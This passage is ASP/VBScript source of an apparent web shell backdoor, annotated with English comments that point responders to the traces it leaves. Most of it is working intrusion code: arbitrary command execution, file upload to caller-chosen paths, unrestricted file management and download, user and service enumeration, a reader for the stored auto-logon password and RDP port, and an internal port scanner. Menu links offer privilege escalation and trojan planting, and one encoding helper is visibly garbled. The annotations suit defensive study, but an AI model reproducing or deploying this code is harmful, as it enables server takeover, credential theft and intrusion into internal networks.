serv-u提权</a></td></tr>"
rrs"<tr><td height='22'><a href='?action=readreg' target='fileframe'>→
读取注册表</a></td></tr>"
rrs"<tr><td height='20'><a href='javascript:fullform("""&repath
(session("folderpath")&"\newfolder")&""",""newfolder"")'>→新建目录
<hr></a></td></tr>"
rrs"<tr><td height='20'><a href='?action=editfile' target='fileframe'>
→新建文本</a></td></tr>"
rrs"<tr><td height='22'><a href='?action=upfile' target='fileframe'>→
上传文件</a></td></tr>"
rrs"<tr><td height='22'><a href='?action=kmuma' target='fileframe'>→查
找木马</b></a></td></tr>"
rrs"<tr><td height='22'><a href='?action=cplgm&m=1' target='fileframe'>
→高级挂马</a></td></tr>"
rrs"<tr><td height='22'><a href='?action=cplgm&m=2' target='fileframe'>
→批量清马</a></td></tr>"
rrs"<tr><td height='22'><a href='?action=cplgm&m=3' target='fileframe'>
→批量替换</a></td></tr>"
rrs"<tr><td height='22'><a href='?action=plgm' target='fileframe'></b>
→低级挂马</a></b></td></tr>"
rrs"<tr><td height='22'><a href='?action=logout' target='_top'>→退出登
录</a></td></tr>"
rrs"<tr><td align=center
style='color:red'><hr>"©right2&"</td></tr></table>"
rrs"</table>"
end function
' Opens the Jet (Access) database file named by thepath, reads every row of
' its "filedata" table and writes each row's "filecontent" bytes to a file
' under the directory of this script (server.mappath(".")), creating missing
' folders on the way. Existing files are overwritten (savetofile option 2).
' The relative path comes straight from the row's "thepath" column and is not
' checked here, and errors are suppressed by "on error resume next".
' For responders: a burst of new files below the web root appearing next to a
' database file that was uploaded shortly before is the trace this leaves.
' fsox is defined outside this excerpt; ws is declared and released but never
' assigned in this sub.
sub unpack(thepath)
on error resume next
server.scripttimeout = 5000
dim rs, ws, str, conn, stream, connstr, thefolder
str = server.mappath(".") & "\"
set rs = createobject("adodb.recordset")
set stream = createobject("adodb.stream")
set conn = createobject("adodb.connection")
connstr = "provider=microsoft.jet.oledb.4.0;data
source=" & thepath & ";"
conn.open connstr
rs.open "filedata", conn, 1, 1
stream.open
' type 1 = binary stream
stream.type = 1
do until rs.eof
thefolder = left(rs("thepath"), instrrev(rs
("thepath"), "\"))
if fsox.folderexists(str & thefolder) = false
then
createfolder(str & thefolder)
end if
stream.seteos()
stream.write rs("filecontent")
stream.savetofile str & rs("thepath"), 2
rs.movenext
loop
rs.close
conn.close
stream.close
set ws = nothing
set rs = nothing
set stream = nothing
set conn = nothing
end sub
' Walks thepath from left to right, one backslash at a time, and creates each
' prefix that does not exist yet through fsox (an object defined outside this
' excerpt). The existence test uses the prefix including the trailing
' backslash; the create call uses the prefix without it.
sub createfolder(thepath)
dim i
i = instr(thepath, "\")
do while i > 0
if fsox.folderexists(left(thepath, i)) = false
then
fsox.createfolder(left(thepath, i - 1))
end if
' advance i to the next backslash, or end the loop when there is none
if instr(mid(thepath, i + 1), "\") then
i = i + instr(mid(thepath, i + 1), "\")
else
i = 0
end if
loop
end sub
' Enumerates the objects returned by the ADSI path "winnt://." and writes
' them as an HTML table. Objects whose starttype is empty are listed as
' system users/groups; the others are listed with name, display name, start
' type (2 = automatic, 3 = manual, 4 = disabled per the labels below) and
' binary path. Entries with start type 2 whose path characters 4-6 are not
' "win" go into the red group (si1), everything else into the blue one (si2).
' Errors are suppressed, so properties missing on an object are skipped
' silently.
' For responders: account and service enumeration issued from the web
' worker process is not something a normal site does.
function course()
si="<br><table width='600' bgcolor='menu' border='0' cellspacing='1'
cellpadding='0' align='center'>"
si=si&"<tr><td height='20' colspan='3' align='center' bgcolor='menu'>系
统用户与服务</td></tr>"
on error resume next
for each obj in getobject("winnt://.")
err.clear
if obj.starttype="" then
si=si&"<tr>"
si=si&"<td height=""20"" bgcolor=""#ffffff""> "
si=si&obj.name
si=si&"</td><td bgcolor=""#ffffff""> "
si=si&"系统用户(组)"
si=si&"</td></tr>"
si0="<tr><td height=""20"" bgcolor=""#ffffff""
colspan=""2""> </td></tr>"
end if
if obj.starttype=2 then lx="自动"
if obj.starttype=3 then lx="手动"
if obj.starttype=4 then lx="禁用"
if lcase(mid(obj.path,4,3))<>"win" and obj.starttype=2 then
si1=si1&"<tr><td height=""20""
bgcolor=""#ffffff""> "&obj.name&"</td><td height=""20""
bgcolor=""#ffffff""> "&obj.displayname&"<tr><td height=""20""
bgcolor=""#ffffff"" colspan=""2"">[启动类型:"&lx&"]<font
color=#ff0000> "&obj.path&"</font></td></tr>"
else
si2=si2&"<tr><td height=""20""
bgcolor=""#ffffff""> "&obj.name&"</td><td height=""20""
bgcolor=""#ffffff""> "&obj.displayname&"<tr><td height=""20""
bgcolor=""#ffffff"" colspan=""2"">[启动类型:"&lx&"]<font
color=#3399ff> "&obj.path&"</font></td></tr>"
end if
next
rrs si&si0&si1&si2&"</table>"
end function
' Writes a host fingerprint table: server name, local address, current time,
' processor count, OS and web server software (all read from
' request.servervariables), followed by rows 0 to 13 of the obt table, which
' is defined outside this excerpt.
' The address row is wrapped in a form that posts the server's IP to
' http://www.ip138.com/index.asp in a new window, i.e. to a third-party site.
function serverinfo()
si="<br><table width='80%' bgcolor='menu' border='0' cellspacing='1'
cellpadding='0' align='center'>"
si=si&"<tr><td height='20' colspan='3' align='center' bgcolor='menu'>服
务器组件信息</td></tr>"
si=si&"<tr align='center'><td height='20' width='200'
bgcolor='#ffffff'>服务器名</td><td bgcolor='#ffffff'> </td><td
bgcolor='#ffffff'>"&request.servervariables("server_name")&"</td></tr>"
si=si&"<form method=post action='http://www.ip138.com/index.asp'
name='ipform' target='_blank'><tr align='center'><td height='20'
width='200' bgcolor='#ffffff'>服务器ip</td><td
bgcolor='#ffffff'> </td><td bgcolor='#ffffff'>"
si=si&"<input type='text' name='ip' size='15'
value='"&request.servervariables("local_addr")
&"'style='border:0px'><input type='submit' value='查
询'style='border:0px'><input type='hidden' name='action'
value='2'></td></tr></form>"
si=si&"<tr align='center'><td height='20' width='200'
bgcolor='#ffffff'>服务器时间</td><td bgcolor='#ffffff'> </td><td
bgcolor='#ffffff'>"&now&" </td></tr>"
si=si&"<tr align='center'><td height='20' width='200'
bgcolor='#ffffff'>服务器cpu数量</td><td
bgcolor='#ffffff'> </td><td
bgcolor='#ffffff'>"&request.servervariables("number_of_processors")
&"</td></tr>"
si=si&"<tr align='center'><td height='20' width='200'
bgcolor='#ffffff'>服务器操作系统</td><td
bgcolor='#ffffff'> </td><td
bgcolor='#ffffff'>"&request.servervariables("os")&"</td></tr>"
si=si&"<tr align='center'><td height='20' width='200'
bgcolor='#ffffff'>web服务器版本</td><td
bgcolor='#ffffff'> </td><td
bgcolor='#ffffff'>"&request.servervariables("server_software")
&"</td></tr>"
for i=0 to 13
si=si&"<tr align='center'><td height='20' width='200'
bgcolor='#ffffff'>"&obt(i,0)&"</td><td bgcolor='#ffffff'>"&obt(i,1)
&"</td><td bgcolor='#ffffff' align=left>"&obt(i,2)&"</td></tr>"
next
rrs si
end function
' Sends the file at path to the client as an attachment: the response buffer
' is cleared, the file is loaded in binary mode into the object created from
' obt(6,0) (presumably the ADODB.Stream ProgID - obt is defined outside this
' excerpt), and its bytes are written with content-type
' application/octet-stream. The download name is whatever follows the last
' backslash in path.
' path is not restricted to the web root, so any file the web worker
' identity can read may leave the host this way.
' For responders: octet-stream attachment responses served by an .asp URL
' that normally returns HTML are worth correlating with response sizes in
' the web logs.
function downfile(path)
response.clear
set osm = createobject(obt(6,0))
osm.open
osm.type = 1
osm.loadfromfile path
sz=instrrev(path,"\")+1
response.addheader "content-disposition", "attachment; filename=" &
mid(path,sz)
response.addheader "content-length", osm.size
response.charset = "utf-8"
response.contenttype = "application/octet-stream"
response.binarywrite osm.read
response.flush
osm.close
set osm = nothing
end function
' Helper applied to file content before it is placed in the edit textarea.
' NOTE(review): as printed, each replace maps a character to itself and the
' chr(34) line is not a valid string literal. The replacement values were
' presumably HTML entities that the hosting page decoded when it rendered the
' listing, so this function cannot be read literally from this copy.
' Returns nothing (empty) when s is null.
function htmlencode(s)
if not isnull(s) then
s = replace(s, ">", ">")
s = replace(s, "<", "<")
s = replace(s, chr(39), "'")
s = replace(s, chr(34), """)
s = replace(s, chr(20), " ")
htmlencode = s
end if
end function
' Upload handler. Without action2=post it writes a multipart form whose
' destination field "topath" is pre-filled with session("folderpath") plus
' "\diy3.asp". With action2=post it parses the request body through the upc
' class and saves the uploaded part "localfile" to the full path supplied in
' "topath", then ends the response.
' The destination path and file extension are entirely caller-controlled, so
' this can place further server-side script anywhere the web worker identity
' may write.
' For responders: multipart POSTs carrying action=upfile&action2=post in the
' URL, followed by new script files in writable directories, are the trace.
' Denying write access to script-executable directories for the application
' pool identity removes the capability.
function upfile()
if request("action2")="post" then
set u=new upc : set f=u.ua("localfile")
uname=u.form("topath")
if uname="" or f.filesize=0 then
si="<br>请输入上传的完全路径后选择一个文件上传!"
else
f.saveas uname
if err.number=0 then
si="<center><br><br><br>文件"&uname&"上传成功!</center>"
end if
end if
set f=nothing:set u=nothing
si=si&backurl
rrs si
showerr()
response.end
end if
si="<br><br><br><table border='0' cellpadding='0' cellspacing='0'
align='center'>"
si=si&"<form name='upform' method='post' action='"&url&"?
action=upfile&action2=post' enctype='multipart/form-data'>"
si=si&"<tr><td>"
si=si&"上传路径:<input name='topath' value='"&rrepath(session
("folderpath")&"\diy3.asp")&"' size='40'>"
si=si&" <input name='localfile' type='file' size='25'>"
si=si&" <input type='submit' name='submit' value='上传'>"
si=si&"</td></tr></form></table>"
rrs si
end function
' Command-execution page. The interpreter path is taken from the request
' field "sp" (remembered in session("shellpath"), defaulting to "diy3.asp" in
' this listing) and the command from the field "cmd"; both are concatenated
' as  shellpath & " /c " & cmd  and run on the server.
'   - with wscript=yes: run through exec on the object created from obt(1,0)
'     (obt is defined outside this excerpt); stdout is appended to the page
'     without HTML encoding.
'   - otherwise: run through wscript.shell run with output redirected to
'     cmd.txt in the script's directory, which is read back, HTML-encoded and
'     then deleted.
' For responders: the web worker process spawning a command interpreter, and
' a short-lived cmd.txt next to the script, are the artefacts of this path.
' Blocking the application pool identity from creating the wscript.shell
' object and from executing system binaries removes the capability.
function cmd1shell()
checked=" checked"
if request("sp")<>"" then session("shellpath") = request("sp")
shellpath=session("shellpath")
if shellpath="" then shellpath = "diy3.asp"
if request("wscript")<>"yes" then checked=""
if request("cmd")<>"" then defcmd = request("cmd")
si="<form method='post'>"
si=si&"shell路径:<input name='sp' value='"&shellpath&"'
style='width:70%'> "
si=si&"<input class=c type='checkbox' name='wscript'
value='yes'"&checked&">wscript.shell"
si=si&"<input name='cmd' style='width:92%' value='"&defcmd&"'> <input
type='submit' value='执行'><textarea style='width:100%;height:440;'
class='cmd'>"
if request.form("cmd")<>"" then
if request.form("wscript")="yes" then
set cm=createobject(obt(1,0))
set dd=cm.exec(shellpath&" /c "&defcmd)
aaa=dd.stdout.readall
si=si&aaa
else
on error resume next
set ws=server.createobject("wscript.shell")
set ws=server.createobject("wscript.shell")
set fso=server.createobject("scripting.filesystemobject")
sztempfile = server.mappath("cmd.txt")
call ws.run (shellpath&" /c " & defcmd & " > " & sztempfile, 0, true)
set fs = createobject("scripting.filesystemobject")
set ofilelcx = fs.opentextfile (sztempfile, 1, false, 0)
aaa=server.htmlencode(ofilelcx.readall)
ofilelcx.close
call fso.deletefile(sztempfile, true)
si=si&aaa
end if
end if
si=si&chr(13)&"</textarea></form>"
rrs si
end function
' Login gate. When session("web2a2dmin") does not equal userpass, the script
' either checks the posted "pass" field against the hard-coded userpass
' (plain string comparison, no rate limit) or prints the password form, and
' then ends the response so nothing below runs for an unauthenticated session.
' The session key name "web2a2dmin" and the banner strings below are stable
' text that can be used for content scanning of web roots.
' NOTE(review): "©right" looks like "&copyright&" after the hosting page
' decoded the "&copy" entity; sic is defined outside this excerpt.
if session("web2a2dmin")<>userpass then
if request.form("pass")<>"" then
if request.form("pass")=userpass then
session("web2a2dmin")=userpass
response.redirect url
else
rrs"<br><br><br><b><div align=center><font size='14' color='red'>注:
请勿用于非法用途,否则后果自负!!!</font></b> <br><br><br><br><b><div
align=center><font size='14' color='lime'>hack by:漫步云端
</font></b></p>"
end if
else
si="<center><div style='width:500px;border:1px solid
#222;padding:22px;margin:100px;'><br><a href='"&siteurl&"'
target='_blank'>"&mname&"</a><hr><form action='"&url&"' method='post'>
密码:<input name='pass' type='password' size='22'> <input
type='submit' value='登录'><hr>"©right&"</center>"
if instr(si,sic)<>0 then rrs si
end if
response.end
end if
dim t1
' Hand-written multipart/form-data parser used by the upload page.
' On construction it reads the whole request body into the global stream t1,
' splits it on the boundary line and fills two dictionaries:
'   d1 - text fields (lower-cased name -> value, repeated names joined by ", ")
'   d2 - file parts (lower-cased name -> fif object holding offset and size)
' The body is read in one call of request.totalbytes bytes; no size limit is
' applied here. Part headers and text values are decoded as gb2312.
' The dictionary and stream objects are created from obt(4,0) and obt(6,0);
' obt is defined outside this excerpt.
class upc
dim d1,d2
' Returns the text field named f, or "" when it was not posted.
public function form(f)
f=lcase(f)
if d1.exists(f) then:form=d1(f):else:form="":end if
end function
' Returns the fif object for file field f, or an empty fif (size 0).
public function ua(f)
f=lcase(f)
if d2.exists(f) then:set ua=d2(f):else:set ua=new fif:end if
end function
private sub class_initialize
dim
tda,tst,vbcrlf,tin,diend,t2,tlen,tfl,sfv,fstart,fend,dstart,dend,upname
set d1=createobject(obt(4,0))
if request.totalbytes<1 then exit sub
set t1 = createobject(obt(6,0))
t1.type = 1 : t1.mode =3 : t1.open
t1.write request.binaryread(request.totalbytes)
t1.position=0 : tda =t1.read : dstart = 1
dend = lenb(tda)
set d2=createobject(obt(4,0))
vbcrlf = chrb(13) & chrb(10)
set t2 = createobject(obt(6,0))
' tst = first line of the body, i.e. the multipart boundary
tst = midb(tda,1, instrb(dstart,tda,vbcrlf)-1)
tlen = lenb (tst)
dstart=dstart+tlen+1
while (dstart + 10) < dend
' diend = offset just past the blank line that ends this part's headers
diend = instrb(dstart,tda,vbcrlf & vbcrlf)+3
t2.type = 1 : t2.mode =3 : t2.open
t1.position = dstart
t1.copyto t2,diend-dstart
t2.position = 0 : t2.type = 2 : t2.charset ="gb2312"
tin = t2.readtext : t2.close
' dstart now points at the next boundary, which ends this part's data
dstart = instrb(diend,tda,tst)
fstart = instr(22,tin,"name=""",1)+6
fend = instr(fstart,tin,"""",1)
upname = lcase(mid (tin,fstart,fend-fstart))
if instr (45,tin,"filename=""",1) > 0 then
' file part: only offset and length are recorded; the client file name and
' content type are located but not stored
set tfl=new fif
fstart = instr(fend,tin,"filename=""",1)+10
fend = instr(fstart,tin,"""",1)
fstart = instr(fend,tin,"content-type: ",1)+14
fend = instr(fstart,tin,vbcr)
tfl.filestart =diend
tfl.filesize = dstart -diend -3
if not d2.exists(upname) then
d2.add upname,tfl
end if
else
' text part: decode the value and store or append it in d1
t2.type =1 : t2.mode =3 : t2.open
t1.position = diend : t1.copyto t2,dstart-diend-3
t2.position = 0 : t2.type = 2
t2.charset ="gb2312"
sfv = t2.readtext
t2.close
if d1.exists(upname) then
d1(upname)=d1(upname)&", "&sfv
else
d1.add upname,sfv
end if
end if
dstart=dstart+tlen+1
wend
tda=""
set t2 =nothing
end sub
' Releases the dictionaries and the body stream when a body was read.
private sub class_terminate
if request.totalbytes>0 then
d1.removeall:d2.removeall
set d1=nothing:set d2=nothing
t1.close:set t1 =nothing
end if
end sub
end class
' One uploaded file part: an offset (filestart) and a byte count (filesize)
' into the global request-body stream t1 that class upc fills.
class fif
dim filesize,filestart
private sub class_initialize
filesize = 0
filestart= 0
end sub
' Copies filesize bytes from t1 at filestart into a new binary stream and
' saves it to path f, overwriting an existing file (savetofile option 2).
' Return value is inverted relative to the name: true when nothing was
' written (empty path or no file part), false after the file was saved.
' f is used as given; no directory or extension check is made here.
public function saveas(f)
dim t3
saveas=true
if trim(f)="" or filestart=0 then exit function
set t3=createobject(obt(6,0))
t3.mode=3 : t3.type=1 : t3.open
t1.position=filestart
t1.copyto t3,filesize
t3.savetofile f,2
t3.close
set t3=nothing
saveas=false
end function
end class
' File-manager class. It wraps one object created from obt(0,0) (obt is
' defined outside this excerpt; the members used below - drives, getfolder,
' fileexists, deletefile, copyfolder ... - match Scripting.FileSystemObject)
' and exposes browse, edit, delete, copy, move and create operations.
' Every path argument is used as supplied by the caller; nothing confines the
' operations to the web root, so the reach is whatever the web worker
' identity can access on local and mapped drives.
' copy*/move* expect "source||||destination" in a single string.
' For responders: file-system auditing on the web root and on system
' directories for writes and deletes made by the application pool identity
' covers all of the operations below.
class lbf
dim cf
private sub class_initialize
set cf=createobject(obt(0,0))
end sub
private sub class_terminate
set cf=nothing
end sub
' Writes one link per drive reported by cf.drives.
function showdriver()
for each d in cf.drives
rrs" <a href='javascript:showfolder
("""&d.driveletter&":\\"")'>本地磁盘 ("&d.driveletter&":)</a><br>"
next
end function
' Lists the folder at path: sub-folders first (three per row, each with
' copy/delete/move/download links), then one table per file with
' download/edit/delete/copy/move links, size in KB, type and modified date.
' File and folder names are written into the page without HTML encoding.
function show1file(path)
set fold=cf.getfolder(path)
i=0
si="<table width='100%' border='0' cellspacing='0'
cellpadding='0'><tr>"
for each f in fold.subfolders
si=si&"<td height=10>"
si=si&"<a href='javascript:showfolder("""&repath(path&"\"&f.name)
&""")' title=""打开""><font face='wingdings'
size='6'>0</font>"&f.name&"</a>"
si=si&" _<a href='javascript:fullform("""&repath
(path&"\"&f.name)&""",""copyfolder"")' onclick='return yesok()'
class='am' title='复制'>复制</a>"
si=si&" <a href='javascript:fullform("""&replace
(path&"\"&f.name,"\","\\")&""",""delfolder"")' onclick='return yesok
()' class='am' title='删除'>删除</a>"
si=si&" <a href='javascript:fullform("""&repath
(path&"\"&f.name)&""",""movefolder"")' onclick='return yesok()'
class='am' title='移动'>移动</a>"
si=si&" <a href='javascript:fullform("""&repath
(path&"\"&f.name)&""",""downfile"")' onclick='return yesok()'
class='am' title='下载'>下载</a></td>"
i=i+1
if i mod 3 = 0 then si=si&"</tr><tr>"
next
si=si&"</tr><tr><td height=2></td></tr></table>"
rrs si &"<hr noshade color=""#cccccc"" size=1 color=""#"" />" :
si=""
for each l in fold.files
si="<table width='100%' border='0' cellspacing='0'
cellpadding='0'>"
si=si&"<tr style='boungroup-color:#'>"
si=si&"<td height='30'><a href='javascript:fullform("""&repath
(path&"\"&l.name)&""",""downfile"");' title='下载'><font
face='wingdings' size='4'>2</font>"&l.name&"</a></td>"
si=si&"<td width='40' align=""center""><a
href='javascript:fullform("""&repath(path&"\"&l.name)
&""",""editfile"")' class='am' title='编辑'>编辑</a></td>"
si=si&"<td width='40' align=""center""><a
href='javascript:fullform("""&repath(path&"\"&l.name)&""",""delfile"")'
onclick='return yesok()' class='am' title='删除'>删除</a></td>"
si=si&"<td width='40' align=""center""><a
href='javascript:fullform("""&repath(path&"\"&l.name)
&""",""copyfile"")' class='am' title='复制'>复制</a></td>"
si=si&"<td width='40' align=""center""><a
href='javascript:fullform("""&repath(path&"\"&l.name)
&""",""movefile"")' class='am' title='移动'>移动</a></td>"
si=si&"<td width='50' align=""center"">"&clng(l.size/1024)&"k</td>"
si=si&"<td width='200' align=""center"">"&l.type&"</td>"
si=si&"<td width='160'>"&l.datelastmodified&"</td>"
si=si&"</tr></table>"
rrs si:si=""
next
set fold=nothing
end function
' Deletes the file at path when it exists and reports success.
function delfile(path)
if cf.fileexists(path) then
cf.deletefile path
si="<center><br><br><br>文件 "&path&" 删除成功!</center>"
si=si&backurl
rrs si
end if
end function
' With action2=post: (re)creates the file at path and writes the posted
' "content" field into it, then ends the response. Otherwise shows an edit
' form holding the current file content, or a blank form for
' session("folderpath")\newfile.asp when path is empty.
function editfile(path)
if request("action2")="post" then
set t=cf.createtextfile(path)
t.writeline request.form("content")
t.close
set t=nothing
si="<center><br><br><br>文件保存成功!</center>"
si=si&backurl
rrs si
response.end
end if
if path<>"" then
set t=cf.opentextfile(path, 1, false)
txt=htmlencode(t.readall)
t.close
set t=nothing
else
path=session("folderpath")&"\newfile.asp":txt="新建文件"
end if
si=si&"<form action='"&url&"?action2=post' method='post'
name='editform'>"
si=si&"<input name='action' value='editfile' type='hidden'>"
si=si&"<input name='fname' value='"&path&"' style='width:100%'><br>"
si=si&"<textarea name='content'
style='width:100%;height:450'>"&txt&"</textarea><br>"
si=si&"<hr><input name='goback' type='button' value='返回'
onclick='history.back();'> <input name='reset'
type='reset' value='重置'> <input name='submit'
type='submit' value='保存'></form>"
rrs si
end function
' Copies file path(0) to path(1); path arrives as "src||||dst".
function copyfile(path)
path = split(path,"||||")
if cf.fileexists(path(0)) and path(1)<>"" then
cf.copyfile path(0),path(1)
si="<center><br><br><br>文件"&path(0)&"复制成功!</center>"
si=si&backurl
rrs si
end if
end function
' Moves file path(0) to path(1); path arrives as "src||||dst".
function movefile(path)
path = split(path,"||||")
if cf.fileexists(path(0)) and path(1)<>"" then
cf.movefile path(0),path(1)
si="<center><br><br><br>文件"&path(0)&"移动成功!</center>"
si=si&backurl
rrs si
end if
end function
' Deletes the folder at path when it exists.
function delfolder(path)
if cf.folderexists(path) then
cf.deletefolder path
si="<center><br><br><br>目录"&path&"删除成功!</center>"
si=si&backurl
rrs si
end if
end function
' Copies folder path(0) to path(1); path arrives as "src||||dst".
function copyfolder(path)
path = split(path,"||||")
if cf.folderexists(path(0)) and path(1)<>"" then
cf.copyfolder path(0),path(1)
si="<center><br><br><br>目录"&path(0)&"复制成功!</center>"
si=si&backurl
rrs si
end if
end function
' Moves folder path(0) to path(1); path arrives as "src||||dst".
function movefolder(path)
path = split(path,"||||")
if cf.folderexists(path(0)) and path(1)<>"" then
cf.movefolder path(0),path(1)
si="<center><br><br><br>目录"&path(0)&"移动成功!</center>"
si=si&backurl
rrs si
end if
end function
' Creates the folder at path when path is non-empty and does not exist yet.
function newfolder(path)
if not cf.folderexists(path) and path<>"" then
cf.createfolder path
si="<center><br><br><br>目录"&path&"新建成功!</center>"
si=si&backurl
rrs si
end if
end function
end class
' Reads two groups of registry values through wscript.shell regread and
' prints them:
'   - the terminal-services (RDP) listening port from the rdp-tcp winstation
'     key, and
'   - the Winlogon auto-logon settings: autoadminlogon, defaultusername and
'     defaultpassword.
' When auto-logon is enabled the stored account name and its clear-text
' password are written to the page.
' For administrators: a defaultpassword value under Winlogon is readable by
' any code that can read that key, so hosts that run a web server should not
' have auto-logon configured with a stored password.
' Errors are suppressed; a failed password read prints "false" and then the
' (empty) password line.
sub getterminalinfo()
on error resume next
set wsx = server.createobject("wscript.shell")
dim terminalportpath, terminalportkey, termport
dim autologinpath, autologinuserkey, autologinpasskey
dim isautologinenable, autologinenablekey, autologinusername,
autologinpassword
terminalportpath = "hklm\system\currentcontrolset\control\terminal
server\winstations\rdp-tcp\"
terminalportkey = "portnumber"
termport = wsx.regread(terminalportpath & terminalportkey)
rrs "终端服务端口及自动登录<hr/><ol>"
if termport = "" or err.number <> 0 then
rrs"无法得到终端服务端口, 请检查权限是否已经受到限制.<br/>"
else
rrs "当前终端服务端口: " & termport & "<br/>"
end if
autologinpath = "hkey_local_machine\software\microsoft\windows
nt\currentversion\winlogon\"
autologinenablekey = "autoadminlogon"
autologinuserkey = "defaultusername"
autologinpasskey = "defaultpassword"
isautologinenable = wsx.regread(autologinpath & autologinenablekey)
if isautologinenable = 0 then
rrs "系统自动登录功能未开启<br/>"
else
autologinusername = wsx.regread(autologinpath & autologinuserkey)
rrs "自动登录的系统帐户: " & autologinusername & "<br>"
autologinpassword = wsx.regread(autologinpath & autologinpasskey)
if err then
err.clear
rrs "false"
end if
rrs "自动登录的帐户密码: " & autologinpassword & "<br>"
end if
rrs "</ol>"
end sub
' Registry reader page. It prints a form with a free-text "thepath" field
' and, in a hidden span, a reference list of value names related to logon
' display, anonymous enumeration, default shares and TCP/IP filtering.
' When thepath is supplied, the value is read with wscript.shell regread and
' printed (element by element when the result is an array). The path is
' caller-controlled and the output is not HTML-encoded.
' Only reads are performed here; what can be read is bounded by the registry
' ACLs that apply to the web worker identity.
sub readreg()
rrs "注册表键值读取:<hr/>"
rrs "<form method=post>"
rrs "<input type=hidden value=readreg name=theact>"
rrs "<input name=thepath
value='hklm\system\currentcontrolset\control\computername\computername\
computername' size=80>"
rrs " <input type=submit value=' 读取 '>"
rrs "<span id=regeditinfo style='display:none;'><hr/>"
rrs "hklm\software\microsoft\windows\currentversion\winlogon\dont-
displaylastusername,reg_sz,1 {不显示上次登录用户}<br/>"
rrs
"hklm\system\currentcontrolset\control\lsa\restrictanonymous,reg_dword,
0 {0=缺省,1=匿名用户无法列举本机用户列表,2=匿名用户无法连接本机ipc$共享
}<br/>"
rrs
"hklm\system\currentcontrolset\services\lanmanserver\parameters\autosha
reserver,reg_dword,0 {禁止默认共享}<br/>"
rrs
"hklm\system\currentcontrolset\services\lanmanserver\parameters\enables
harednetdrives,reg_sz,0 {关闭网络共享}<br/>"
rrs
"hklm\system\currentcontrolset\services\tcpip\parameters\enablesecurity
filters,reg_dword,1 {启用tcp/ip筛选(所有试配器)}<br/>"
rrs "hklm\system\controlset001
\services\tcpip\parameters\ipenablerouter,reg_dword,1 {允许ip路由}
<br/>"
rrs "-------以下似乎要看绑定的网卡,不知道是否准确---------<br/>"
rrs
"hklm\system\currentcontrolset\services\tcpip\parameters\interfaces\{8a
465128-8e99-4b0c-aff3-1348dc55eb2e}\defaultgateway,reg_muti_sz {默认网
关}<br/>"
rrs
"hklm\system\currentcontrolset\services\tcpip\parameters\interfaces\{8a
465128-8e99-4b0c-aff3-1348dc55eb2e}\nameserver {首dns}<br/>"
rrs "hklm\system\controlset001
\services\tcpip\parameters\interfaces\{8a465128-8e99-4b0c-aff3-
1348dc55eb2e}\tcpallowedports {允许的tcp/ip端口}<br/>"
rrs "hklm\system\controlset001
\services\tcpip\parameters\interfaces\{8a465128-8e99-4b0c-aff3-
1348dc55eb2e}\udpallowedports {允许的udp端口}<br/>"
rrs "-----------over--------------------<br/>"
rrs "hklm\system\controlset001\services\tcpip\enum\count {共几块活动网
卡}<br/>"
rrs "hklm\system\controlset001\services\tcpip\linkage\bind {当前网卡的
序列(把上面的替换)}<br/>"
rrs "</span>"
rrs "</form><hr/>"
if request("thepath")<>"" then
on error resume next
set wsx = server.createobject("wscript.shell")
thepath=request("thepath")
thearray=wsx.regread(thepath)
if isarray(thearray) then
for i=0 to ubound(thearray)
rrs "<li>" & thearray(i)
next
else
rrs "<li>" & thearray
end if
end if
end sub
' Port-probe page. It prints a form (address field pre-filled with the
' server's own local_addr, port list defaulting to
' 21,23,25,80,110,135,139,445,1433,3389,43958) and, when the hidden "scan"
' field is posted, calls scan() for every address/port combination.
' Input syntax handled below: comma-separated addresses; an address holding
' "-" is treated as a range on the last octet; ports are single numbers or
' "start-end" ranges; anything else is echoed back as "is not number".
' The script timeout is raised to 7776000 seconds for the duration.
' Probes originate from the web server itself, so they reach hosts on the
' internal network that a perimeter firewall hides from outside.
' For responders: the web worker process opening many short-lived outbound
' TCP connections across ports or neighbouring addresses is the trace;
' egress filtering for the server's own outbound traffic limits it.
sub scanport()
server.scripttimeout = 7776000
if request.form("port")="" then
portlist="21,23,25,80,110,135,139,445,1433,3389,43958"
else
portlist=request.form("port")
end if
if request.form("ip")="" then
ip="127.0.0.1"
else
ip=request.form("ip")
end if
rrs"<p>端口扫描器</p>"
rrs"<form name='form1' method='post' action=''
onsubmit='form1.submit.disabled=true;'>"
rrs"<p>scan ip: "
rrs" <input name='ip' type='text' class='textbox' id='ip'
value='"&request.servervariables("local_addr")&"' size='60'>"
rrs"<br>port list:"
rrs"<input name='port' type='text' class='textbox' size='60'
value='"&portlist&"'>"
rrs"<br><br>"
rrs"<input name='submit' type='submit' class='buttom' value=' 扫描 '>"
rrs"<input name='scan' type='hidden' id='scan' value='111'>"
rrs"</p></form>"
if request.form("scan") <> "" then
timer1 = timer
rrs("<b>扫描报告:</b><br><hr>")
tmp = split(request.form("port"),",")
ip = split(request.form("ip"),",")
for hu = 0 to ubound(ip)
' single address
if instr(ip(hu),"-") = 0 then
for i = 0 to ubound(tmp)
if isnumeric(tmp(i)) then
call scan(ip(hu), tmp(i))
else
seekx = instr(tmp(i), "-")
if seekx > 0 then
startn = left(tmp(i), seekx - 1 )
endn = right(tmp(i), len(tmp(i)) - seekx )
if isnumeric(startn) and isnumeric(endn) then
for j = startn to endn
call scan(ip(hu), j)
next
else
rrs(startn & " or " & endn & " is not number<br>")
end if
else
rrs(tmp(i) & " is not number<br>")
end if
end if
next
else
' address range on the last octet; the start value is read as one character
ipstart = mid(ip(hu),1,instrrev(ip(hu),"."))
for xxx = mid(ip(hu),instrrev(ip(hu),".")+1,1) to mid(ip(hu),instr(ip
(hu),"-")+1,len(ip(hu))-instr(ip(hu),"-"))
for i = 0 to ubound(tmp)
if isnumeric(tmp(i)) then
call scan(ipstart & xxx, tmp(i))
else
seekx = instr(tmp(i), "-")
if seekx > 0 then
startn = left(tmp(i), seekx - 1 )
endn = right(tmp(i), len(tmp(i)) - seekx )
if isnumeric(startn) and isnumeric(endn) then
for j = startn to endn
call scan(ipstart & xxx,j)
next
else
rrs(startn & " or " & endn & " is not number<br>")
end if
else
rrs(tmp(i) & " is not number<br>")
end if
end if
next
next
end if
next
timer2 = timer
thetime=cstr(int(timer2-timer1))
rrs"<hr>process in "&thetime&" s"
end if
end sub
' Probes one address/port pair by opening an ADODB connection with the
' sqloledb provider to "targetip,portnum" and a one-second connection
' timeout, then classifying the resulting error: for error numbers
' -2147217843 and -2147467259 the port is reported closed when the error
' description contains "(connect())." and open otherwise. Other outcomes
' print nothing.
' No raw socket is used, so this works wherever the SQL OLE DB provider can
' be instantiated by the web worker identity.
' The fixed string "user id=lake2" in the connection string is a stable
' content-scanning indicator for this probe routine.
sub scan(targetip, portnum)
on error resume next
